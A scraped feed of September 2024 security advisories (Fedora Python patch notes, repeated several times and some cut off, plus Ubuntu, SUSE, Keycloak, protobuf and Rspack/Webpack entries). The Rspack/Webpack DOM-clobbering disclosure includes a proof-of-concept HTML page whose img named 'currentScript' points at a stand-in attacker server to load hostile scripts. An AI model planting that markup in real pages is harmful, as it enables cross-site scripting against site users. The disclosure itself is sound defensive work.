Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f652468298
20.09.2024 03:44:06	fedora	[FEDORA-2024-7db9258d37] Fedora 39: python3.9 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7db9258d37
20.09.2024 03:44:06	fedora	[FEDORA-2024-37d9c902dd] Fedora 39: python3.11 (high)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-37d9c902dd
20.09.2024 03:44:03	fedora	[FEDORA-2024-2fb325d068] Fedora 39: ruby (medium)	Upgrade to Ruby 3.2.5.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2fb325d068
20.09.2024 03:44:01	fedora	[FEDORA-2024-2fff2b9a18] Fedora 39: frr (high)	Fix for CVE-2024-44070	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2fff2b9a18
20.09.2024 03:16:29	fedora	[FEDORA-2024-7a069f48e4] Fedora 41: python3.8 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7a069f48e4
20.09.2024 03:16:28	fedora	[FEDORA-2024-308628ebb8] Fedora 41: python3.9 (critical)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.This is a security release of Python 3.9Note: The release you're looking at is Python 3.9.20, a security bugfix releasefor the legacy 3.9 series. Python 3.12 is now the latest feature release seriesof Python 3. Get the latest release of 3.12.x here.Security content in this releasegh-123678 and gh-116741: Upgrade bundled libexpat to 2.6.3 to fixCVE-2024-28757, CVE-2024-45490, CVE-2024-45491 and CVE-2024-45492.gh-118486: os.mkdir() on Windows now accepts mode of 0o700 to restrict the newdirectory to the current user. This fixes CVE-2024-4030 affectingtempfile.mkdtemp() in scenarios where the base temporary directory is morepermissive than the default.gh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see [`ver	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-308628ebb8
20.09.2024 03:16:28	fedora	[FEDORA-2024-ae2925c3ae] Fedora 41: python3.11 (high)	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ae2925c3ae
20.09.2024 03:16:10	fedora	[FEDORA-2024-acb9425c93] Fedora 41: iwd, libell, bluez (high)	libell 0.69:Add support for getting remaining microseconds left on a timer.Add support for setting link MTU on a network interface.iwd 2.21:Fix issue with pending scan requests after regdom update.Fix issue with handling the rearming of the roaming timeout.Fix issue with survey request and externally triggered scans.Fix issue with RSSI fallback when setting CQM threshold fails.Fix issue with FT-over-Air without offchannel support.Add support for per station Affinities property.bluez 5.78:Fix issue with handling notification of scanned BISes to BASSFix issue with handling checking BIS caps against peer caps.Fix issue with handling MGMT Set Device Flags overwrites.Fix issue with handling ASE notification order.Fix issue with handling BIG Info report events.Fix issue with handling PACS Server role.Fix issue with registering UHID_START multiple times.Fix issue with pairing method not setting auto-connect.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-acb9425c93
19.09.2024 22:42:32	ubuntu	[USN-6968-2] PostgreSQL vulnerability	PostgreSQL could execute arbitrary SQL functions as the superuserif it received a specially crafted SQL object.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6968-2
19.09.2024 21:33:23	suse	[SUSE-SU-2024:3349-1] Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3349-1
20.09.2024 00:34:31	maven	[MAVEN:GHSA-4XX7-2CX3-X473] Keycloak SAML signature validation flaw (high)	A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4XX7-2CX3-X473
20.09.2024 00:34:31	maven	[MAVEN:GHSA-VVF8-2H68-9475] Keycloak Open Redirect vulnerability (moderate)	A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VVF8-2H68-9475
19.09.2024 21:03:56	suse	[SUSE-SU-2024:3348-1] Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3348-1
19.09.2024 21:03:39	suse	[SUSE-SU-2024:3347-1] Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5) (important)	Security update for the Linux Kernel (Live Patch 11 for SLE 15 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3347-1
19.09.2024 20:36:42	ubuntu	[USN-7015-2] Python vulnerabilities	Several security issues were fixed in Python.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-2
19.09.2024 20:30:06	npm	[NPM:GHSA-84JW-G43V-8GJM] DOM Clobbering Gadget found in Rspack's AutoPublicPathRuntimeModule that leads to XSS (moderate)	Hi, Rspack\|Webpack developer team!## SummaryWe discovered a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.We found the real-world exploitation of this gadget in the Canvas LMS which allows XSS attack happens through an javascript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack’s code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.## Details### BackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:[1] [scnps.co/papers/sp23_domclob.pdf](https://scnps.co/papers/sp23_domclob.pdf)[2] [research.securitum.com/xss-in-amp4email-dom-clobbering](https://research.securitum.com/xss-in-amp4email-dom-clobbering/)### Gadgets found in Webpack \| RspackWe identified a DOM Clobbering vulnerability in Webpack’s AutoPublicPathRuntimeModule. When the output.publicPath field in the configuration is not set or is set to auto, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:```js/*****/ / webpack/runtime/publicPath //***/ (() => {/**/ var scriptUrl;/**/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";/**/ var document = __webpack_require__.g.document;/**/ if (!scriptUrl && document) {/**/ if (document.currentScript)/**/ scriptUrl = document.currentScript.src;/**/ if (!scriptUrl) {/**/ var scripts = document.getElementsByTagName("script");/**/ if(scripts.length) {/**/ var i = scripts.length - 1;/**/ while (i > -1 && (!scriptUrl \|\| !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;/**/ }/**/ }/**/ }/**/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration/**/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic./**/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");/***/ scriptUrl = scriptUrl.replace(/#.$/, "").replace(/\?.$/, "").replace(/\/[^\/]+$/, "/");/***/ __webpack_require__.p = scriptUrl;/**/ })();```However, this code is vulnerable to a DOM Clobbering attack. The lookup on the line with document.currentScript can be shadowed by an attacker, causing it to return an attacker-controlled HTML element instead of the current script element as intended. In such a scenario, the src attribute of the attacker-controlled element will be used as the scriptUrl and assigned to __webpack_require__.p. If additional scripts are loaded from the server, __webpack_require__.p will be used as the base URL, pointing to the attacker's domain. This could lead to arbitrary script loading from the attacker's server, resulting in severe security risks.## PoCPlease note that we have identified a real-world exploitation of this vulnerability in the Canvas LMS. Once the issue has been patched, I am willing to share more details on the exploitation. For now, I’m providing a demo to illustrate the concept.Consider a website developer with the following two scripts, entry.js and import1.js, that are compiled using Webpack:```js// entry.jsimport('./import1.js') .then(module => { module.hello(); }) .catch(err => { console.error('Failed to load module', err); });``````js// import1.jsexport function hello () { console.log('Hello');}The webpack.config.js is set up as follows:const path = require('path');module.exports = { entry: './entry.js', // Ensure the correct path to your entry file output: { filename: 'webpack-gadgets.bundle.js', // Output bundle file path: path.resolve(__dirname, 'dist'), // Output directory publicPath: "auto", // Or leave this field not set }, target: 'web', mode: 'development',};```When the developer builds these scripts into a bundle and adds it to a webpage, the page could load the import1.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.```html<!DOCTYPE html><html><head> <title>Webpack Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!></head><script src="./dist/webpack-gadgets.bundle.js"></script><body></body></html>```## ImpactThis vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes.## PatchA possible patch to this vulnerability could refer to the Google Closure project which makes itself resistant to DOM Clobbering attack: [google/closure-library@b312823/closure/goog/base.js#L174](https://github.com/google/closure-library/blob/b312823ec5f84239ff1db7526f4a75cba0420a33/closure/goog/base.js#L174)```js/***/ / webpack/runtime/publicPath //***/ (() => {/**/ var scriptUrl;/**/ if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";/**/ var document = __webpack_require__.g.document;/**/ if (!scriptUrl && document) {/**/ if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT') // Assume attacker cannot control script tag, otherwise it is XSS already :>/**/ scriptUrl = document.currentScript.src;/**/ if (!scriptUrl) {/**/ var scripts = document.getElementsByTagName("script");/**/ if(scripts.length) {/**/ var i = scripts.length - 1;/**/ while (i > -1 && (!scriptUrl \|\| !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;/**/ }/**/ }/**/ }/**/ // When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration/**/ // or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic./**/ if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");/***/ scriptUrl = scriptUrl.replace(/#.$/, "").replace(/\?.$/, "").replace(/\/[^\/]+$/, "/");/***/ __webpack_require__.p = scriptUrl;/****/ })();```Please note that if we do not receive a response from the development team within three months, we will disclose this vulnerability to the CVE agent.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-84JW-G43V-8GJM
19.09.2024 20:16:05	ubuntu	[USN-7027-1] Emacs vulnerabilities	Several security issues were fixed in Emacs.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7027-1
19.09.2024 19:11:22	ubuntu	[USN-7024-1] tgt vulnerability	tgt could be made to generate identical sequence of challenges.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7024-1
19.09.2024 19:06:06	maven	[MAVEN:GHSA-735F-PC8J-V9W8] protobuf-java has potential Denial of Service issue (high)	### SummaryWhen parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <ecosystem@trailofbits.com>Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.### Severity[CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254) High CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.### Proof of ConceptFor reproduction details, please refer to the unit tests (Protobuf Java [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java) and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java)) that identify the specific inputs that exercise this parsing weakness.### Remediation and MitigationWe have been working diligently to address this issue and have released a mitigation that is available now. Please update to the latest available versions of the following packages:* protobuf-java (3.25.5, 4.27.5, 4.28.2)* protobuf-javalite (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)* protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)* com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-735F-PC8J-V9W8
19.09.2024 18:11:27	suse	[SUSE-SU-2024:3345-1] Security update for python-azure-identity (moderate)	Security update for python-azure-identity	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3345-1
